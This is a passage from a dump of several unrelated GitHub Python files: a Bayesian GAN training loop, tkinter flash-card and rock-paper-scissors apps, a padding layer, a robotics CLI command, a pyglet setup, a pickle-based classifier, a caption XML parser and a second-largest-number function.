classes of CIFAR.\nnum_classes = 11\nnetD = _netD(opt.ngpu, num_classes=num_classes)\n#netD = _BayesianLeNetD(1,3)\n\n# In order to calculate errG or errD_real, we need to sum the probabilities over all the classes (1 to K)\n# ComplementCrossEntropyLoss is a loss function that performs this task\n# We can specify a default except_index that corresponds to a fake label. 
In this case, we use index=0\nfrom ComplementCrossEntropyLoss import ComplementCrossEntropyLoss\ncriterion = nn.CrossEntropyLoss()\n# use the default index = 0 - equivalent to summing all other probabilities\ncriterion_comp = ComplementCrossEntropyLoss(except_index=0)\n\n\nfrom utils.BayesianCGANModels.distributions import Normal\nfrom utils.BayesianCGANModels.bayes import NoiseLoss, PriorLoss\n# Finally, initialize the ``optimizers''\n# Since we keep track of a set of parameters, we also need a set of\n# ``optimizers''\nif opt.d_optim == 'adam':\n optimizerD = optim.Adam(netD.parameters(), lr=opt.lr, betas=(0.5, 0.999))\nelif opt.d_optim == 'sgd':\n optimizerD = torch.optim.SGD(netD.parameters(), lr=opt.lr,\n momentum=0.9,\n nesterov=True,\n weight_decay=1e-4)\noptimizerGs = []\nfor netG in netGs:\n optimizerG = optim.Adam(netG.parameters(), lr=opt.lr, betas=(0.5, 0.999))\n optimizerGs.append(optimizerG)\n\n# since the log posterior is the average per sample, we also scale down the prior and the noise\ngprior_criterion = PriorLoss(prior_std=1., observed=1000.)\ngnoise_criterion = NoiseLoss(params=netGs[0].parameters(), scale=math.sqrt(2*opt.gnoise_alpha/opt.lr), observed=1000.)\ndprior_criterion = PriorLoss(prior_std=1., observed=50000.)\ndnoise_criterion = NoiseLoss(params=netD.parameters(), scale=math.sqrt(2*opt.dnoise_alpha*opt.lr), observed=50000.)\n\n\n# Fixed noise for data generation\nfixed_noise = torch.FloatTensor(opt.batchSize, opt.nz, 1, 1).normal_(0, 1).cuda()\nfixed_noise = Variable(fixed_noise)\n\n# initialize input variables and use CUDA (optional)\ninput = torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize)\nnoise = torch.FloatTensor(opt.batchSize, opt.nz, 1, 1)\nlabel = torch.FloatTensor(opt.batchSize)\nreal_label = 1\nfake_label = 0\n\nif opt.cuda:\n netD.cuda()\n for netG in netGs:\n netG.cuda()\n criterion.cuda()\n criterion_comp.cuda()\n input, label = input.cuda(), label.cuda()\n noise = noise.cuda()\n\n\n# fully supervised\n#netD_fullsup = _BayesianLeNetD(1,3)\nnetD_fullsup = _netD(opt.ngpu, num_classes=num_classes)\nnetD_fullsup.apply(weights_init) #was not commented out\ncriterion_fullsup = nn.CrossEntropyLoss()\nif opt.d_optim == 'adam':\n optimizerD_fullsup = optim.Adam(netD_fullsup.parameters(), lr=opt.lr, betas=(0.5, 0.999))\nelse:\n optimizerD_fullsup = optim.SGD(netD_fullsup.parameters(), lr=opt.lr,\n momentum=0.9,\n nesterov=True,\n weight_decay=1e-4)\nif opt.cuda:\n netD_fullsup.cuda()\n criterion_fullsup.cuda()\n\n\n# We define a class to calculate the accuracy on test set\n# to test the performance of semi-supervised training\ndef get_test_accuracy(model_d, iteration, label='semi'):\n # don't forget to do model_d.eval() before doing evaluation\n top1 = AverageMeter()\n for i, (input, target) in enumerate(dataloader_test):\n target = target.cuda()\n input = input.cuda()\n input_var = torch.autograd.Variable(input.cuda(), volatile=True)\n target_var = torch.autograd.Variable(target, volatile=True)\n output = model_d(input_var)\n\n probs = output.data[:, 1:] # discard the zeroth index\n prec1 = accuracy(probs, target, topk=(1,))[0]\n #top1.update(prec1[0], input.size(0))\n top1.update(prec1, input.size(0))\n if i % 50 == 0:\n print(\"{} Test: [{}/{}]\\t Prec@1 {top1.val:.3f} ({top1.avg:.3f})\".format(label, i, len(dataloader_test), top1=top1))\n print('{label} Test Prec@1 {top1.avg:.2f}'.format(label=label, top1=top1))\n log_value('test_acc_{}'.format(label), top1.avg, iteration)\n\n\niteration = 0\nfor epoch in range(opt.niter):\n top1 = 
AverageMeter()\n top1_weakD = AverageMeter()\n for i, data in enumerate(dataloader):\n iteration += 1\n #######\n # 1. real input\n netD.zero_grad()\n _input, _ = data\n batch_size = _input.size(0)\n if opt.cuda:\n _input = _input.cuda()\n input.resize_as_(_input).copy_(_input) \n label.resize_(batch_size).fill_(real_label) \n inputv = Variable(input)\n labelv = Variable(label)\n \n output = netD(inputv)#used to have no [0] index\n print(output.shape)\n errD_real = criterion_comp(output)\n errD_real.backward()\n # calculate D_x, the probability that real data are classified \n D_x = 1 - torch.nn.functional.softmax(output).data[:, 0].mean()\n \n #######\n # 2. Generated input\n fakes = []\n for _idxz in range(opt.numz):\n noise.resize_(batch_size, opt.nz, 1, 1).normal_(0, 1)\n noisev = Variable(noise)\n for _idxm in range(opt.num_mcmc):\n idx = _idxz*opt.num_mcmc + _idxm\n netG = netGs[idx]\n _fake = netG(noisev)[0]\n fakes.append(_fake)\n fake = torch.cat(fakes)\n output = netD(fake.detach())#used to have no [0] index\n labelv = Variable(torch.LongTensor(fake.data.shape[0]).cuda().fill_(fake_label))\n errD_fake = criterion(output, labelv)\n errD_fake.backward()\n \n D_G_z1 = 1 - torch.nn.functional.softmax(output).data[:, 0].mean()\n \n #######\n # 3. Labeled Data Part (for semi-supervised learning)\n for ii, (input_sup, target_sup) in enumerate(dataloader_semi):\n input_sup, target_sup = input_sup.cuda(), target_sup.cuda()\n break\n input_sup_v = Variable(input_sup.cuda())\n # convert target indicies from 0 to 9 to 1 to 10\n target_sup_v = Variable( (target_sup + 1).cuda())\n output_sup = netD(input_sup_v) #used to have no [0] index\n err_sup = criterion(output_sup, target_sup_v)\n err_sup.backward()\n prec1 = accuracy(output_sup.data, target_sup + 1, topk=(1,))[0]\n #top1.update(prec1[0], input_sup.size(0))\n top1.update(prec1,input_sup.size(0))\n if opt.bayes:\n errD_prior = dprior_criterion(netD.parameters())\n errD_prior.backward()\n errD_noise = dnoise_criterion(netD.parameters())\n errD_noise.backward()\n errD = errD_real + errD_fake + err_sup + errD_prior + errD_noise\n else:\n errD = errD_real + errD_fake + err_sup\n optimizerD.step()\n \n # 4. Generator\n for netG in netGs:\n netG.zero_grad()\n labelv = Variable(torch.FloatTensor(fake.data.shape[0]).cuda().fill_(real_label))\n output = netD(fake)\n errG = criterion_comp(output)\n if opt.bayes:\n for netG in netGs:\n errG += gprior_criterion(netG.parameters())\n errG += gnoise_criterion(netG.parameters())\n errG.backward()\n D_G_z2 = 1 - torch.nn.functional.softmax(output).data[:, 0].mean()\n for optimizerG in optimizerGs:\n optimizerG.step()\n \n # 5. Fully supervised training (running in parallel for comparison)\n netD_fullsup.zero_grad()\n input_fullsup = Variable(input_sup)\n target_fullsup = Variable((target_sup + 1))\n output_fullsup = netD_fullsup(input_fullsup)#used to have no [0] index\n err_fullsup = criterion_fullsup(output_fullsup, target_fullsup)\n optimizerD_fullsup.zero_grad()\n err_fullsup.backward()\n optimizerD_fullsup.step()\n \n # 6. get test accuracy after every interval\n if iteration % opt.stats_interval == 0:\n # get test accuracy on train and test\n netD.eval()\n get_test_accuracy(netD, iteration, label='semi')\n get_test_accuracy(netD_fullsup, iteration, label='sup')\n netD.train()\n \n # 7. 
Report for this iteration\n cur_val, ave_val = top1.val, top1.avg\n log_value('train_acc', top1.avg, iteration)\n #print('[%d/%d][%d/%d] Loss_D: %.2f Loss_G: %.2f D(x): %.2f D(G(z)): %.2f / %.2f | Acc %.1f / %.1f' % (epoch, opt.niter, i, len(dataloader),errD.data[0], errG.data[0], D_x, D_G_z1, D_G_z2, cur_val, ave_val))\n print('[%d/%d][%d/%d] Loss_D: %.2f Loss_G: %.2f D(x): %.2f D(G(z)): %.2f / %.2f | Acc %.1f / %.1f'\n % (epoch, opt.niter, i, len(dataloader),\n errD.data, errG.data, D_x, D_G_z1, D_G_z2, cur_val, ave_val))\n # after each epoch, save images\n vutils.save_image(_input,\n '%s/real_samples.png' % opt.outf,\n normalize=True)\n for _zid in range(opt.numz):\n for _mid in range(opt.num_mcmc):\n idx = _zid*opt.num_mcmc + _mid\n netG = netGs[idx]\n fake = netG(fixed_noise)[0]\n vutils.save_image(fake.data,\n '%s/fake_samples_epoch_%03d_G_z%02d_m%02d.png' % (opt.outf, epoch, _zid, _mid),\n normalize=True)\n for ii, netG in enumerate(netGs):\n torch.save(netG.state_dict(), '%s/netG%d_epoch_%d.pth' % (opt.outf, ii, epoch))\n torch.save(netD.state_dict(), '%s/netD_epoch_%d.pth' % (opt.outf, epoch))\n torch.save(netD_fullsup.state_dict(), '%s/netD_fullsup_epoch_%d.pth' % (opt.outf, epoch))\n\n\n#from tensorflow.python.summary import event_accumulator\nfrom tensorboard.backend.event_processing import event_accumulator\nimport pandas as pd\nfrom plotnine import *\nea = event_accumulator.EventAccumulator(opt.outf)\nea.Reload()\n\n_df1 = pd.DataFrame(ea.Scalars('test_acc_semi'))\n_df2 = pd.DataFrame(ea.Scalars('test_acc_sup'))\ndf = pd.DataFrame()\ndf['Iteration'] = pd.concat([_df1['step'], _df2['step']])\ndf['Accuracy'] = pd.concat([_df1['value'], _df2['value']])\ndf['Classification'] = ['BayesGAN']*len(_df1['step']) + ['Baseline']*len(_df2['step'])\n\n\n# The results show that the Bayesian discriminator trained with the Bayesian generator outperforms the discriminator trained on partial data.\n\n\np = ggplot(df, aes(x='Iteration', y='Accuracy', color='Classification', label='Classification')) + geom_point(size=0.5)\nprint(p)\n","repo_name":"gumin2020/MyDissertation","sub_path":"Convolutional_BayesianGAN/Bayesian GAN in PyTorch.py","file_name":"Bayesian GAN in PyTorch.py","file_ext":"py","file_size_in_byte":16531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
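The comments in the record above derive SGHMC as momentum SGD on the loss plus a noise term: with n ~ N(0, 2αηI), adding L_noise = (1/η) θ·n makes the optimizer step coincide with the SGHMC update. The repo's `NoiseLoss` internals are not shown, so here is a standalone sketch of that trick as the prose states it (note the two `NoiseLoss(...)` constructions above scale by sqrt(2α/lr) and sqrt(2α·lr) respectively; this sketch follows the derivation in the comments):

```python
import math
import torch

# Sketch of the SGHMC noise-loss trick, not the repo's NoiseLoss class.
def sghmc_noise_loss(params, alpha, lr):
    scale = math.sqrt(2.0 * alpha * lr)      # std of n ~ N(0, 2*alpha*eta*I)
    loss = 0.0
    for p in params:
        noise = torch.randn_like(p) * scale
        loss = loss + (noise * p).sum() / lr  # (1/eta) * theta . n
    return loss

# usage: total = main_loss + sghmc_noise_loss(net.parameters(), 1e-4, 2e-4)
```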
+{"seq_id":"35776645612","text":"from tkinter import *\nimport pandas as pd\nfrom random import choice\n\nBACKGROUND_COLOR = \"#B1DDC6\"\ncurrent_word = {}\ndata_dict = {}\n\ntry:\n data = pd.read_csv('Files/words_to_learn.csv')\nexcept FileNotFoundError:\n original_data = pd.read_csv('Files/french_words.csv')\n data_dict = original_data.to_dict(orient=\"records\")\nelse:\n data_dict = data.to_dict(orient=\"records\")\n\n\ndef change_word():\n global current_word, flip_timer\n window.after_cancel(flip_timer)\n current_word = choice(data_dict)\n canvas.itemconfig(lang, text=\"French\", fill=\"black\")\n canvas.itemconfig(word, text=f\"{current_word['French']}\", fill=\"black\")\n canvas.itemconfig(canvas_image, image=card_front_image)\n flip_timer = window.after(3000, func=flip_card)\n\n\ndef flip_card():\n canvas.itemconfig(lang, text=\"English\", fill=\"white\")\n canvas.itemconfig(word, text=f\"{current_word['English']}\", fill=\"white\")\n canvas.itemconfig(canvas_image, image=card_back_image)\n\n\ndef known_words():\n data_dict.remove(current_word)\n new_data = pd.DataFrame(data_dict)\n new_data.to_csv(\"Files/words_to_learn.csv\", index=False)\n\n change_word()\n\n\nwindow = Tk()\nwindow.title(\"Flash Card App\")\nwindow.config(padx=50, pady=50, bg=BACKGROUND_COLOR)\n\nwindow.tk.call('source', 'Files/azure.tcl')\nwindow.tk.call('set_theme', 'light')\n\nflip_timer = window.after(3000, func=flip_card)\n\ncanvas = Canvas(width=800, height=530, highlightthickness=0, bg=BACKGROUND_COLOR)\ncard_front_image = PhotoImage(file='Files/card_front.png')\ncard_back_image = PhotoImage(file='Files/card_back.png')\nright_image = PhotoImage(file='Files/right.png')\nwrong_image = PhotoImage(file='Files/wrong.png')\ncanvas_image = canvas.create_image(400, 263, image=card_front_image)\nlang = canvas.create_text(400, 200, text=\"\", font=(\"Poppins\", 25))\nword = canvas.create_text(400, 300, text=\"\", font=(\"Poppins\", 76, \"bold\"))\ncanvas.grid(row=1, column=1, columnspan=3)\n\nright_btn = Button(image=right_image, border=0, bg=BACKGROUND_COLOR, cursor='hand2',\n command=known_words, activebackground=BACKGROUND_COLOR)\nright_btn.grid(row=2, column=3)\n\nwrong_btn = Button(image=wrong_image, bg=BACKGROUND_COLOR, border=0, cursor='hand2',\n command=change_word, activebackground=BACKGROUND_COLOR)\nwrong_btn.grid(row=2, column=1)\n\nchange_word()\n\nwindow.mainloop()\n","repo_name":"Maliksidk19/100DaysOfPython","sub_path":"Day31_flashCardApp.py","file_name":"Day31_flashCardApp.py","file_ext":"py","file_size_in_byte":2346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"25103747720","text":"\"\"\"Implements the padding layer.\"\"\"\nimport typing\n\nfrom decaf.base import Layer, Blob\n\n\nclass PaddingLayer(Layer):\n \"\"\"A Layer that pads a matrix.\"\"\"\n\n def __init__(self, **kwargs):\n \"\"\"\n Initializes a padding layer.\n kwargs:\n 'pad': the number of pixels to pad, Should be non-negative. If pad is 0, the layer will simply mirror the\n input.\n 'value': the value inserted to the padded area. Default 0.\n \"\"\"\n Layer.__init__(self, **kwargs)\n self._pad: int = self.spec['pad']\n self._value: float = self.spec.get('value', 0)\n if self._pad < 0:\n raise ValueError('Padding should be non-negative.')\n\n def forward(self,\n bottom: typing.List[Blob],\n top: typing.List[Blob]):\n \"\"\"Computes the forward pass.\"\"\"\n if self._pad == 0:\n top[0].mirror(bottom[0].data())\n return\n features = bottom[0].data()\n pad = self._pad\n new_shape = (features.shape[0],\n features.shape[1] + pad * 2,\n features.shape[2] + pad * 2) + features.shape[3:]\n output = top[0].init_data(new_shape, features.dtype)\n output[:] = self._value\n output[:, pad:-pad, pad:-pad] = features\n\n def backward(self,\n bottom: typing.List[Blob],\n top: typing.List[Blob],\n propagate_down: bool):\n \"\"\"Computes the backward pass.\"\"\"\n if not propagate_down:\n return 0.\n if self._pad == 0:\n bottom[0].mirror_diff(top[0].diff())\n else:\n pad = self._pad\n top_diff = top[0].diff()\n bottom_diff = bottom[0].init_diff()\n bottom_diff[:] = top_diff[:, pad:-pad, pad:-pad]\n return 0.\n\n def update(self):\n \"\"\"Padding has nothing to update.\"\"\"\n pass\n","repo_name":"xinpingwang/decaf","sub_path":"decaf/layers/padding.py","file_name":"padding.py","file_ext":"py","file_size_in_byte":1907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"526280271","text":"import click\nfrom rapyuta_io import Build\n\nfrom riocli.build.util import name_to_guid\nfrom riocli.config import new_client\nfrom riocli.utils import inspect_with_format\n\n\n@click.command('inspect')\n@click.option('--format', '-f', 'format_type', default='yaml',\n type=click.Choice(['json', 'yaml'], case_sensitive=False))\n@click.argument('build-name', required=True)\n@name_to_guid\ndef inspect_build(format_type: str, build_guid: str, build_name: str) -> None:\n \"\"\"\n Inspect the build resource\n \"\"\"\n try:\n client = new_client()\n build = client.get_build(build_guid, include_build_requests=True)\n data = make_build_inspectable(build)\n inspect_with_format(data, format_type)\n except Exception as e:\n click.secho(str(e), fg='red')\n raise SystemExit(1)\n\n\ndef make_build_inspectable(build: Build) -> dict:\n build_requests = make_build_requests_inspectable(build)\n build_info = make_build_info_inspectable(build)\n return {\n 'created_at': build.CreatedAt,\n 'updated_at': build.UpdatedAt,\n 'deleted_at': build.DeletedAt,\n 'guid': build.guid,\n 'build_generation': build.buildGeneration,\n 'build_name': build.buildName,\n 'build_info': build_info,\n 'status': build.status,\n 'owner_project': build.ownerProject,\n 'creator': build.creator,\n 'docker_pull_info': build.dockerPullInfo,\n 'build_requests': build_requests,\n 'secret': build.secret,\n 'docker_pull_secret': build.dockerPullSecret,\n 'docker_push_secret': build.dockerPushSecret,\n 'docker_push_repository': build.dockerPushRepository,\n }\n\n\ndef make_build_info_inspectable(build: Build) -> dict:\n build_info = build.buildInfo\n return {\n 'repository': build_info.repository,\n 'strategy_type': build_info.strategyType,\n 'architecture': build_info.architecture,\n 'is_ros': build_info.isRos,\n 'ros_distro': build_info.rosDistro,\n 'simulation_options': {\n 'simulation': build_info.simulationOptions.simulation\n },\n 'build_options': build_info.buildOptions,\n 'branch': build_info.branch,\n 'docker_file_path': build_info.dockerFilePath,\n 'context_dir': build_info.contextDir,\n }\n\n\ndef make_build_requests_inspectable(build: Build) -> list:\n build_request_data = []\n for build_request in build.buildRequests:\n build_request_data.append({\n 'created_at': build_request['CreatedAt'],\n 'updated_at': build_request['UpdatedAt'],\n 'deleted_at': build_request['DeletedAt'],\n 'request_id': build_request['requestId'],\n 'is_complete': build_request['isComplete'],\n 'error_string': build_request['errorString'],\n 'owner_project': build_request['ownerProject'],\n 'creator': build_request['creator'],\n 'trigger_name': build_request['triggerName'],\n 'build_generation': build_request['buildGeneration'],\n 'git_metadata': make_git_metadata_inspectable(build_request['gitMetadata']),\n 'executable_image_info': make_executable_image_info_inspectable(build_request['executableImageInfo']),\n })\n return build_request_data\n\n\ndef make_git_metadata_inspectable(git_metadata: dict) -> dict:\n guid = list(git_metadata.keys())[0]\n guid_details = git_metadata[guid]\n guid_value = {\n 'author': {\n 'email': guid_details['author']['email'],\n 'name': guid_details['author']['name'],\n },\n 'branch': guid_details['branch'],\n 'commit': guid_details['commit'],\n 'committer': {\n 'email': guid_details['committer']['email'],\n 'name': guid_details['committer']['name'],\n },\n 'message': guid_details['message'],\n 'repository_url': guid_details['repositoryUrl']\n }\n return {\n guid: guid_value\n }\n\n\ndef 
make_executable_image_info_inspectable(exec_img_info: dict) -> dict:\n image_info_list = []\n for img_info in exec_img_info['imageInfo']:\n image_info_list.append({\n 'artifact_id': img_info['artifactID'],\n 'image_name': img_info['imageName'],\n })\n return {\n 'image_info': image_info_list\n }\n","repo_name":"rapyuta-robotics/rapyuta-io-cli","sub_path":"riocli/build/inspect.py","file_name":"inspect.py","file_ext":"py","file_size_in_byte":4309,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
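From the decorators above, the command takes a build name plus an optional `--format`/`-f` choice. One hedged way to exercise it locally is click's test runner; this assumes the rapyuta.io credentials that `new_client()` needs are already configured:

```python
from click.testing import CliRunner

# Hypothetical local invocation of the inspect command defined above.
runner = CliRunner()
result = runner.invoke(inspect_build, ["my-build", "--format", "json"])
print(result.output)
```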
+{"seq_id":"36349618389","text":"import random\nimport tkinter as tk\nfrom tkinter import ttk # themed widgets\n\nWIDTH, HEIGHT = 490, 300\nBUTTON_WIDTH, BUTTON_HEIGHT = 22, 6\n\nroot = tk.Tk()\nroot.resizable(False, False)\nroot.geometry(f'{WIDTH}x{HEIGHT}')\nroot.title('rock_paper_scissors')\n\n\ndef play(choice):\n opponent = random.choice(['rock', 'paper', 'scissors'])\n opponentChoice['text'] = f'{opponent}'\n yourChoice['text'] = f'{choice}'\n if ((choice == 'rock' and opponent == 'scissors') or\n (choice == 'paper' and opponent == 'rock') or\n (choice == 'scissors' and opponent == 'paper')):\n winning['text'] = \"You Won\"\n\n t_splitted = statisticsValue['text'].split('/')\n statisticsValue['text'] = f'{int(t_splitted[0])+1}/{t_splitted[1]}/{t_splitted[2]}'\n elif choice == opponent:\n winning['text'] = \"Draw\"\n t_splitted = statisticsValue['text'].split('/')\n statisticsValue['text'] = f'{t_splitted[0]}/{t_splitted[1]}/{int(t_splitted[2])+1}'\n else:\n winning['text'] = \"You Lost\"\n t_splitted = statisticsValue['text'].split('/')\n statisticsValue['text'] = f'{t_splitted[0]}/{int(t_splitted[1])+1}/{t_splitted[2]}'\n\n\nframeUpper = tk.Frame(root)\n\nrock = tk.Button(frameUpper, text=\"rock\", width=BUTTON_WIDTH, height=BUTTON_HEIGHT, command=lambda: play('rock'))\nrock.grid(row=1, column=0)\n\npaper = tk.Button(frameUpper, text=\"paper\", width=BUTTON_WIDTH, height=BUTTON_HEIGHT, command=lambda: play('paper'))\npaper.grid(row=1, column=1)\n\nscissors = tk.Button(frameUpper, text=\"scissors\", width=BUTTON_WIDTH, height=BUTTON_HEIGHT,\n command=lambda: play('scissors'))\nscissors.grid(row=1, column=2)\n\n\nwinning = ttk.Label(root, text=\"Press button to play...\", font='Times 20 bold')\nwinning.grid(row=2)\n\nyourChoiceLabel = ttk.Label(root, text=\"Your Choice:\", font='Times 18')\nyourChoiceLabel.grid(row=3, column=0, sticky=tk.W)\n\nyourChoice = ttk.Label(root, text=\"\", font='Times 20 italic')\nyourChoice.grid(row=3, column=0)\n\nopponentChoice = ttk.Label(root, text=\"Opponent Choice:\", font='Times 18')\nopponentChoice.grid(row=4, column=0, sticky=tk.W)\n\nopponentChoice = ttk.Label(root, text=\"\", font='Times 20 italic')\nopponentChoice.grid(row=4, column=0)\n\nstatistics = ttk.Label(root, text=\"Statistics(W,L,D):\", font='Times 16')\nstatistics.grid(row=5, column=0, sticky=tk.W)\n\nstatisticsValue = ttk.Label(root, text=\"0/0/0\", font='Times 18')\nstatisticsValue.grid(row=5, column=0)\n\nframeUpper.grid(row=1)\nroot.mainloop()\n","repo_name":"noxikoxi/zadaniaPython","sub_path":"zestaw10/rock_paper_scissors.py","file_name":"rock_paper_scissors.py","file_ext":"py","file_size_in_byte":2492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"26549706284","text":"\nfrom pyglet.gl import *\nfrom pyglet.window import mouse\nfrom src.window import Window\nfrom src.cube import *\nfrom config import *\n\ndef setup():\n\n # Set the color of \"clear\", i.e. the sky, in rgba.\n glClearColor(BG_COLOR[0], BG_COLOR[1], BG_COLOR[2],BG_COLOR[3])\n\n # Enable culling (not rendering) of back-facing facets -- facets that aren't\n # visible to you.\n # glEnable( GL_CULL_FACE )\n # Set the texture minification/magnification function to GL_NEAREST (nearest\n # in Manhattan distance) to the specified texture coordinates. GL_NEAREST\n # \"is generally faster than GL_LINEAR, but it can produce textured images\n # with sharper edges because the transition between texture elements is not\n\n # as smooth.\"\n glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, GL_NEAREST)\n glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, GL_NEAREST)\n\n glEnable(GL_FOG)\n # Set the fog color.\n glFogfv(GL_FOG_COLOR, (GLfloat * 4)(BG_COLOR[0], BG_COLOR[1], BG_COLOR[2],BG_COLOR[3]))\n # Say we have no preference between rendering speed and quality.\n glHint(GL_FOG_HINT, GL_DONT_CARE)\n # Specify the equation used to compute the blending factor.\n glFogi(GL_FOG_MODE, GL_LINEAR)\n # How close and far away fog starts and ends. The closer the start and end,\n # the denser the fog in the fog range.\n glFogf(GL_FOG_START, 20.0)\n glFogf(GL_FOG_END, 60.0)\n\n\ndef main():\n window = Window( width=800, height=600, caption='Pyglet', resizable=True )\n # Hide the mouse cursor and prevent the mouse from leaving the window.\n window.set_exclusive_mouse(True)\n setup()\n pyglet.app.run()\n\nif __name__ == '__main__':\n main()\n","repo_name":"y-vas/game","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1685,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"28627809120","text":"# |MODULES|--------------------------------------------------------------------\nimport sys\nimport os.path\nMODULE_PATH = os.path.dirname(__file__)\nimport pandas as pd\nimport pickle as pk\n\n\ndef assess(x):\n clf = pk.load(open(os.path.join(MODULE_PATH,'finalized_model.sav'), 'rb'))\n mean = pk.load(open(os.path.join(MODULE_PATH,'mean.sav'), 'rb'))\n var = pk.load(open(os.path.join(MODULE_PATH,'var.sav'), 'rb'))\n x = (x - mean)/var\n x = x.to_numpy().reshape(1, -1)\n return clf.predict(x)[0]\n\n\nif __name__ == \"__main__\":\n test = pd.read_csv('trainlist.csv')\n y = test.loc[:, \"Class\"].to_numpy()\n test = test.iloc[:, 1:-2]\n for i in range(test.shape[0]):\n #for j, val in enumerate(test.iloc[i].to_list()):\n # print(\"{}\\t{}\\n\".format(j, val))\n print(assess(test.iloc[i]))\n\n # clf = pk.load(open('finalized_model.sav', 'rb'))\n # mean = pk.load(open('mean.sav', 'rb'))\n # print(mean)\n # var = pk.load(open('var.sav', 'rb'))\n # print(var)\n # test = (test - mean)/var\n # test = test.to_numpy()\n\n # predict = clf.score(test, y)\n # print(predict)\n\n\n #print(assess(sample.reshape(1, -1)))\n #train = pd.read_csv('testlist.csv')\n #mean = train.iloc[:, 1:-2].mean(axis=0).to_list()\n #var = train.iloc[:, 1:-2].std(axis=0).to_list()\n #pk.dump(mean, open('mean.sav', 'wb'))\n #pk.dump(var, open('var.sav', 'wb'))\n #print(test)\n #print(mean)\n #print(var)\n\n sys.exit(0)\n","repo_name":"regisaiah/ECE-499---Classifier","sub_path":"mentalfatigue.py","file_name":"mentalfatigue.py","file_ext":"py","file_size_in_byte":1464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"15809668780","text":"\r\nimport random\r\n\r\nclass Game(): #class game with four methods\r\n \r\n def __init__(self):\r\n self.user_item = self.get_user_item()\r\n self.computer_item = self.get_computer_item()\r\n self.winner = self.get_game_result()\r\n \r\n @staticmethod\r\n def get_user_item(): #method to get user input\r\n \r\n user_item = input(\"Choose between (rock/paper/scissors) \\n\")\r\n first_choice= [\"rock\",\"paper\",\"scissors\"]\r\n \r\n for i in first_choice: # loop through the list of options\r\n \r\n if i == user_item:\r\n return user_item\r\n \r\n while user_item not in first_choice:\r\n user_item = input(\"Choose between (rock/paper/scissors) \\n\") \r\n @staticmethod\r\n def get_computer_item(): #method for computer choice\r\n \r\n second_choice = [\"rock\",\"paper\",\"scissors\"]\r\n computer = random.choice(second_choice)\r\n return computer\r\n \r\n def get_game_result(self): #method to display winner\r\n if self.user_item == \"rock\" and self.computer_item == \"paper\":\r\n return \"Computer\"\r\n if self.user_item == \"rock\" and self.computer_item == \"scissors\":\r\n return \"User \"\r\n if self.user_item == \"paper\" and self.computer_item == \"rock\":\r\n return \"User\"\r\n if self.user_item == \"scissors\" and self.computer_item == \"rock\":\r\n return \"Computer\"\r\n if self.user_item == \"rock\" and self.computer_item == \"rock\":\r\n return \"Draw\"\r\n if self.user_item == \"paper\" and self.computer_item == \"scissors\":\r\n return \"Computer\"\r\n if self.user_item == \"scissors\" and self.computer_item == \"paper\":\r\n return \"User\"\r\n if self.user_item == \"paper\" and self.computer_item == \"paper\":\r\n return \"Draw\"\r\n if self.user_item == \"scissors\" and self.computer_item == \"scissors\":\r\n return \"Draw\"\r\n \r\n def play(self): \r\n if self.winner == \"Draw\": \r\n print(f'user 1 selected {self.user_item} and computer selected {self.computer_item} There a tie')\r\n else:\r\n print(f'user 1 selected {self.user_item} and computer selected {self.computer_item} The winner is {self.winner}')\r\n \r\ntest = Game()\r\n\r\n\r\ntest.play()\r\n\r\n\r\n\r\n\r\n\r\n \r\n ","repo_name":"Mengawanji/Dev-Ins","sub_path":"Week 5/day 5/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":2355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"30627662814","text":"from lxml import etree\nfrom pprint import pprint as pp\n\nfilename = \"CBS_COLBERT_{episode:04d}_CONTENT_CIAN_caption_{kind}.xml\"\nfilepath = \"data/\" + filename\n\nfor i in range(1, 20):\n path = filepath.format(kind=\"DFXP\", episode=i)\n\n tree = etree.parse(path)\n root = tree.getroot()\n\n ns_mapping = {'ns':'http://www.w3.org/ns/ttml'}\n full_text = \" \".join([ptext for ptext in root.xpath('//ns:tt/ns:body/ns:div/ns:p//text()', namespaces=ns_mapping)])\n\n pp(full_text.split(\">>\"))","repo_name":"tsizzle/the-late-show-with-stephen-colbert-analysis","sub_path":"parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"13948933731","text":"def print2largest(arr, arr_size):\n if (arr_size < 2):\n print(\" Invalid Input \");\n return\n largest = second = -2454635434;\n for i in range(0, arr_size):\n largest = max(largest, arr[i]);\n for i in range(0, arr_size):\n if (arr[i] != largest):\n second = max(second, arr[i])\n \n if (second == -2454635434):\n print(\"There is no second \" +\n \"largest element\")\n else:\n print(\"The second largest \" +\n \"element is \\n\", second)\n \narr = list(map(int,input().split()))\nn = len(arr)\nprint2largest(arr, n)\n","repo_name":"Arshadfaizan/aps-codelibrary","sub_path":"SecondLargest.py","file_name":"SecondLargest.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
